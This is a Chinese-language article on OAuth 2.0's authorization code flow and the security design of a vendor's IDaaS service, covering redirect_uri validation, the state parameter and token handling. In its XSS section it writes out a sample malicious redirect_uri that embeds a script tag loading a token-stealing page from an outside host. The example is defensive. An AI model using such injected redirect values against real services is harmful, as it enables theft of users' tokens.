前言：

OAuth是Open Authorization的简写。OAuth协议为用户资源的授权提供了一个安全的、开放而又简易的标准。同时，任何第三方都可以使用OAUTH认证服务，任何服务提供商都可以实现自身的OAuth认证服务，因而OAuth是开放的。业界提供了OAuth的多种实现如PHP、JavaScript，Java，Ruby等各种语言开发包，大大节约了程序员的时间，因而OAuth是简易的。

OAuth2是OAuth协议的2.0版本，不向后兼容OAuth1.0。

OAuth 2.0定义了四种授权方式，其中的授权码模式（authorization code）是功能最完整、流程最严密的授权模式。

需要知道的基础概念

  首先需要了解几个基本的服务方：

（1） Third-party application：第三方应用程序，又称"客户端"（client），比如禅道

（2）Resource Owner：资源所有者，又称"用户"（user）,即登录用户。

（3）User Agent：用户代理，本文中就是指浏览器。

（4）Authorization server：认证服务器，即服务提供商专门用来处理认证的服务器或提供认证服务的提供商，如：赛赋IDaaS服务

（5）Resource server：资源服务器，即服务提供商存放用户生成的资源的服务器。它与认证服务器，可以是同一台服务器，也可以是不同的服务器，一般来说是同一个服务商，如：赛赋IDaaS服务。

这些概念看起来比较复杂，用一张简单的图来示例可能更为清楚些“

认证服务方提供的几个地址

请求授权接口http://www.cipherchina.com:8443/cipher/oauth/authorize，用于获取授权码auth code

请求token接口http://www.cipherchina.com:8443/cipher/oauth/access_token，通过授权码请求临token

获取用户信息的接口http://www.cipherchina.com:8443/cipher/oauth/user，通过token向资源服务器请求用户的信息

认证的流程

OAuth 2.0定义了四种授权方式，赛赋IDaaS使了其中的授权码模式（authorization code），也是最完整的流程，   以下为流程图：

IDP服务地址赛赋IDaaS

赛赋科技IDaaS提供线上调试的地址，注册后可以快速理解和配置IDP服务。

注册后，添加Oauth应用，配置指导

配置文档

赛赋IDaaS Oauth应用对接配置指导配置指导链接

Oauth协议的安全设计

OAuth2.0协议是目前被运用最为广泛的一个SSO协议，在协议设计中对各类风险和安全问题进行了严格的评估和设计，开发时应当严格遵循OAuth2.0的安全相关的指导。

其中主要的风险点及解决方法如下：

1:严格验证clientId和redirect_url防止回调域名欺骗

赛赋IDaaS严格地验证clientid注册的应用资源与redirect_url是对应的，否则redirect_url会被伪造成第三方欺诈域名，直接导致赛赋IDaaS返回的授权码Code被泄露；

赛赋IDaaS生成的授权码Code仅一次有效，客户端使用一次后立即失效并且有效期很短，以此保证通过redirect_url浏览器回调传输的授权Code被客户端正常消费后不会被再次使用。

2:检查redirect_url以杜绝XSS跨域攻击

比如构造一个认证请求

redirect_uri = http://api.safesso.cn/OAuth?callback=<script src="http://app.com?getToken.html"></script>

赛赋IDaaS将对redirect_url进行检查禁止特殊字符输入，并且对redirect_url进行全匹配，不做模糊匹配可有效杜绝XSS攻击；

3:随机的State参数防止CSRF

赛赋IDaaS强制要求应用资源使用state参数。

应用资源每次请求生成唯一字符串在请求中放到state参数中，赛赋IDaaS认证成功返回Code会带上state参数，赛赋IDaaS验证state是否是自己生成的唯一串，可以确定这次请求是有赛赋IDaaS真实发出的，不是黑客伪造的请求。

4:密秘并且随机AccessToken

应用资源通过授权码Code直接与赛赋IDaaS服务端进行交互获取AccessToken，不允许AccessToken传给前端直接使用，防止AccessToken在前端被非法截获；

同时，赛赋IDaaS对AccessToken进行了处理以保证AccessToken的信息不可猜测，以防止被猜测得到。

5:Token颁发和时效管理

Token由赛赋IDaaS随机产生，与应用资源和用户账号绑定；

并且刷新失效机制的设计不允许长期有效的Token存在。

相关实现

Oauth第三方应用如何通过Java实现

如你为第三方应用的开发商，或是研发人员，如何让自己的应用快速支持Oauth 2.0 ，以便于和腾讯、微博等认证服务商实现对接，或是和内部的IAM， IDaaS服务，如赛赋等快速集成。

可以参考OAuth2的应用认证Client实现指引

赛赋IDaaS git项目

https://github.com/CipherChina